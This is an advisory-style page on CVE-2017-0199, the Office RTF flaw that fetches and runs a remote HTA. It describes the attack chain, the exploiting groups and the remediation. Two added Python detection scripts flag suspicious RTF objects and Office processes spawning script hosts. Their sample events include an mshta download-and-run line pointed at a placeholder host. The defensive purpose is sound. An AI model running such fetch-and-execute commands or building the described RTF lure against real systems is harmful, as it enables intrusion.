CVE-2017-0199 — Microsoft Office and WordPad Remote Code Execution Vulnerability

CVE-2017-0199

Microsoft Office/WordPad — RTF OLE2 HTA Zero-Day: Moniker Download-and-Execute Before April 2017 Patch; Used by Carbanak, APT32, Dridex; Ransomware Delivery

What Is Microsoft Office?

Microsoft Office is the world's dominant productivity suite, running on hundreds of millions of desktops in corporate, government, and personal environments. Office's deep integration with Windows — including the ability to embed linked objects (OLE) from external sources — makes it a high-value target for attackers. The RTF (Rich Text Format) and OLE (Object Linking and Embedding) components of Office have been a recurring source of remote code execution vulnerabilities, as they parse complex binary formats and can automatically fetch and process external content.

Overview

Actively Exploited. This vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on November 3, 2021. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2017-0199 is a remote code execution vulnerability in Microsoft Office and WordPad that was actively exploited as a zero-day before Microsoft patched it on April 11, 2017. The vulnerability allows an attacker to embed a malicious OLE2 link (using a Windows moniker) inside an RTF document; when Office opens the file, it automatically fetches and executes an HTML Application (HTA) file from an attacker-controlled server — achieving code execution with no additional user interaction beyond opening the document. Discovered in active exploitation by McAfee and FireEye on April 7, 2017, CVE-2017-0199 was immediately adopted by multiple nation-state groups and cybercriminal actors. CISA added it to the KEV catalog in November 2021 as one of the most significant Office vulnerabilities in history.

Affected Versions

Microsoft Office 2007 SP3: Vulnerable
Microsoft Office 2010 SP2 (32-bit and 64-bit): Vulnerable
Microsoft Office 2013 SP1 (32-bit and 64-bit): Vulnerable
Microsoft Office 2016 (32-bit and 64-bit): Vulnerable
Microsoft WordPad (Windows 7 through 10): Vulnerable
All of the above with the April 2017 security update: Fixed

Technical Details

CVE-2017-0199 exploits the Windows OLE (Object Linking and Embedding) mechanism, specifically the ability to embed linked objects that point to external sources using Windows monikers. The attack works as follows:

  1. Crafted RTF document: The attacker creates an RTF file containing an \objlink OLE2 control with a packager.dll or objautlink moniker pointing to an attacker-controlled HTA (HTML Application) URL
  2. Automatic fetch: When Office opens the RTF, it automatically resolves the moniker link and fetches the remote HTA file over HTTP without user prompting — this is the design flaw
  3. HTA execution: The fetched HTA is executed by the Windows Script Host (mshta.exe), which can run arbitrary VBScript or JScript with full user-level access
  4. No macro warning: The attack bypasses Office's macro security controls entirely — no yellow "Enable Content" warning appears because no macros are involved

Why this was particularly dangerous:

  • The attack required only that a user open a document — no "Enable Content" prompt, no macro warning
  • The payload is fetched live from the attacker's server, making static AV detection difficult
  • HTA execution provides full scripting capability: download and run executables, enumerate the system, establish C2
  • The CVSS attack vector is Local (AV:L) because the vulnerability is reached through file delivery, but the practical attack chain is phishing email → user opens attachment → immediate code execution
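The detection side of the chain described above, as an added example that is not from the original page or from any vendor named on it: a small Python heuristic scanner that flags RTF files carrying a linked object (\objautlink) that refreshes itself on open (\objupdate) and whose \*\objdata hex blob names the OLE2Link class or contains a UTF-16LE URL. The control words are standard RTF; the two sample documents are constructed stubs, not real exploit files, and the "placeholder.invalid" URL is invented. The regex-based objdata extraction is a deliberate simplification: it stops at the first byte that is neither hex nor whitespace, so heavily obfuscated samples need a full RTF tokenizer.

```python
"""Heuristic scanner for RTF documents carrying an auto-updating OLE2Link
object, the CVE-2017-0199 delivery pattern. Added example; the sample
documents below are constructed stubs, not real exploit files."""
import binascii
import re

# RTF control words of interest (standard RTF syntax)
AUTOLINK_RE = re.compile(rb"\\objautlink\b")   # linked (not embedded) object
UPDATE_RE = re.compile(rb"\\objupdate\b")      # force refresh of the link on open
# Hex payload of a \*\objdata destination; stops at the first non-hex,
# non-whitespace byte, so heavily obfuscated samples need a fuller RTF parser
OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9A-Fa-f\s]*)")
# URL monikers store their target as UTF-16LE, so "http" appears as h\0t\0t\0p\0
URL_UTF16_RE = re.compile(rb"h\x00t\x00t\x00p\x00", re.IGNORECASE)


def extract_objdata(rtf: bytes) -> list:
    """Decode every \\*\\objdata hex blob in the document into raw bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s", b"", m.group(1))
        if len(hexstr) % 2:           # tolerate a truncated trailing nibble
            hexstr = hexstr[:-1]
        try:
            blobs.append(binascii.unhexlify(hexstr))
        except binascii.Error:
            continue
    return blobs


def scan_rtf(rtf: bytes) -> dict:
    """Return the individual indicators plus an overall verdict."""
    findings = {
        "is_rtf": rtf.lstrip().startswith(b"{\\rt"),   # {\rtf1 and the {\rtxx variants
        "objautlink": bool(AUTOLINK_RE.search(rtf)),
        "objupdate": bool(UPDATE_RE.search(rtf)),
        "ole2link": False,
        "url_in_objdata": False,
    }
    for blob in extract_objdata(rtf):
        if b"OLE2Link" in blob:
            findings["ole2link"] = True
        if URL_UTF16_RE.search(blob):
            findings["url_in_objdata"] = True
    # A linked object on its own is normal; a linked OLE2Link object that
    # refreshes itself on open is the shape of the attack and should be
    # quarantined for analyst review rather than opened
    findings["suspicious"] = (
        findings["is_rtf"]
        and findings["objautlink"]
        and (findings["ole2link"] or findings["objupdate"])
    )
    return findings


# Constructed samples: a plain document, and a stub whose object data merely
# names the OLE2Link class and a placeholder UTF-16LE URL (not a real stream)
BENIGN_RTF = b"{\\rtf1\\ansi Quarterly report text only.}"
_STUB_BLOB = (b"\x01\x05\x00\x00\x02\x00\x00\x00OLE2Link\x00"
              + "http://placeholder.invalid/".encode("utf-16-le"))
SUSPICIOUS_RTF = (
    b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata "
    + binascii.hexlify(_STUB_BLOB)
    + b"}}}"
)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_RTF), ("suspicious", SUSPICIOUS_RTF)):
        print(name, scan_rtf(doc))
```

Run it on a mail-gateway quarantine folder and route any document with `suspicious` set to an analyst; the individual indicator flags are kept separate so that a tuned rule can, for example, treat `objautlink` plus a URL in the object data as sufficient even when the class name is absent.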

Attack Characteristics

Attack Vector: File delivery (phishing/download)
Authentication: None (opens as current user)
User Interaction: Open malicious document
Payload Mechanism: Windows moniker → remote HTA execution
Bypasses: Office macro security, Protected View for trusted files

Discovery

Ryan Hanson of OPTIV discovered CVE-2017-0199 in mid-2016 and reported it to Microsoft. Microsoft was still developing a patch when McAfee and FireEye discovered active exploitation in the wild in early April 2017 — approximately one week before the April 11 Patch Tuesday. Microsoft accelerated the patch to include it in the April 2017 security update. The public disclosure and patch release triggered immediate mass adoption by both criminal and nation-state actors who reverse-engineered the fix.

Exploitation Context

  • Zero-day exploitation before patch: Multiple threat actors exploited CVE-2017-0199 before the April 2017 patch — FireEye observed a Russian-speaking group delivering the LATENTBOT payload, while other actors targeted financial organizations; the zero-day window was approximately 9+ months from OPTIV's discovery
  • Carbanak/FIN7 deployment: The financially-motivated Carbanak/FIN7 group used CVE-2017-0199 to deliver malware against financial institutions and hospitality companies, delivering their custom backdoor tooling via booby-trapped Word documents sent to employees
  • APT32 (OceanLotus): The Vietnamese state-sponsored group APT32 adopted CVE-2017-0199 for targeted espionage campaigns in Southeast Asia using lure documents themed around Vietnamese news topics
  • Dridex banking trojan delivery: Cybercriminal groups incorporated CVE-2017-0199 into Dridex distribution campaigns, which is why CISA flags this entry with known ransomware use: Dridex infections frequently cascaded into BitPaymer and other ransomware deployments
  • Rapid commoditization: Within days of the patch, public exploit code appeared and the major exploit kits and spam botnets (RIG, Necurs) began distributing CVE-2017-0199 payloads, making it one of the fastest-commoditized zero-days of 2017
  • CISA KEV (2021): Added November 3, 2021 — one of the initial KEV entries, reflecting its enduring relevance as unpatched Office installations continued to be targeted years after the 2017 patch

Remediation

CISA BOD 22-01 Deadline: May 3, 2022. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

  1. Apply April 2017 Office security update — install the April 11, 2017 security update for all Microsoft Office versions (2007, 2010, 2013, 2016) and WordPad. This is critical.

  2. Enable Office Protected View — ensure Protected View is enabled in Office Trust Center settings for files from the internet and email attachments; this prevents automatic moniker resolution in untrusted documents.

  3. Disable automatic link updates — configure Office to not automatically update linked objects:

    • File → Options → Advanced → General → uncheck "Update automatic links at open"

  4. Block HTA execution — use AppLocker or Windows Defender Application Control (WDAC) to block execution of mshta.exe, preventing HTA payload execution even if the exploit fires.

  5. Enable Attack Surface Reduction rules — the ASR rule "Block Office applications from creating child processes" prevents Word and Excel from spawning mshta.exe, cmd.exe, and other shells used by CVE-2017-0199 payloads.

  6. Block outbound HTTP from Office processes — network-level egress filtering that blocks Office applications from making outbound HTTP/S connections prevents the moniker fetch from retrieving the HTA payload.
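Items 4 and 5 above block the Office-to-mshta.exe parent/child step; the same relationship is what a SOC alerts on where the ASR rule is not yet enforced. As an added example that is not from the page or from Microsoft, the Python below runs simple detection logic over constructed, Sysmon-style process-creation records (JSON lines using the real Sysmon Event ID 1 field names Image, ParentImage and CommandLine; every host name, path and URL in the samples is invented). An Office or WordPad parent launching a script host is flagged, and mshta.exe given a remote URL argument, the exact CVE-2017-0199 shape, is rated highest.

```python
"""Flag Office/WordPad processes spawning script hosts, the child-process
step of the CVE-2017-0199 chain. Added example; the events are constructed."""
import json
from typing import Optional

# Parent images that should not normally launch script interpreters
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe"}
# Children that the ASR "Block Office applications from creating child
# processes" rule would stop
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}

# Constructed Sysmon-style Event ID 1 records (invented hosts, paths, URLs)
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"EventID": 1, "Computer": "ws01",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://placeholder.invalid/update"},
    {"EventID": 1, "Computer": "ws01",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",        # print helper: benign child
     "CommandLine": "splwow64.exe"},
    {"EventID": 1, "Computer": "ws02",
     "ParentImage": r"C:\Windows\explorer.exe",  # not an Office parent
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe"},
    {"EventID": 1, "Computer": "ws03",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "Computer": "ws04",
     "ParentImage": r"C:\Program Files\Windows NT\Accessories\wordpad.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\user\AppData\Local\Temp\local.hta"},
]]


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a severity for a process-creation event, or None if not relevant."""
    if event.get("EventID") != 1:
        return None
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "").lower()
    # mshta.exe handed a remote URL is the moniker-to-HTA pattern itself
    if child == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
        return "critical"
    if child == "mshta.exe":
        return "high"
    return "medium"


def detect(lines) -> list:
    """Run classify() over JSON lines and return the alerts in input order."""
    alerts = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records rather than stall the pipeline
        severity = classify(event)
        if severity:
            alerts.append({
                "computer": event.get("Computer"),
                "parent": _basename(event["ParentImage"]),
                "child": _basename(event["Image"]),
                "severity": severity,
            })
    return alerts


if __name__ == "__main__":
    print(json.dumps(detect(SAMPLE_EVENTS), indent=2))
```

The three alerts this produces (ws01 critical, ws03 medium, ws04 high) are the events an analyst would want first; the benign print helper and the explorer.exe-launched mshta.exe are deliberately left out so the rule stays quiet on normal desktop activity.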

Key Details

CVE ID: CVE-2017-0199
Vendor / Product: Microsoft — Office and WordPad
NVD Published: 2017-04-12
NVD Last Modified: 2025-10-22
CVSS 3.1 Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Severity: HIGH
CWE: CWE-20 — Improper Input Validation
CISA KEV Added: 2021-11-03
CISA KEV Deadline: 2022-05-03
Known Ransomware Use: ⚠️ Yes

CVSS 3.1 Breakdown

Attack Vector: Local
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Required Action

CISA BOD 22-01 Deadline: 2022-05-03. Apply updates per vendor instructions.

Timeline

2017-04-07: McAfee and FireEye publish reports on active zero-day exploitation of CVE-2017-0199 in the wild
2017-04-11: Microsoft releases out-of-band patch for CVE-2017-0199 (April 2017 Patch Tuesday)
2017-04-12: CVE-2017-0199 published by NVD
2017-04-14: Public exploit code released; rapid adoption by exploit kit operators and additional threat actors
2021-11-03: Added to CISA Known Exploited Vulnerabilities catalog
2022-05-03: CISA BOD 22-01 remediation deadline

References

NVD — CVE-2017-0199 (vulnerability database)
CISA KEV Catalog Entry (US Government)
Microsoft Security Advisory — CVE-2017-0199 (vendor advisory)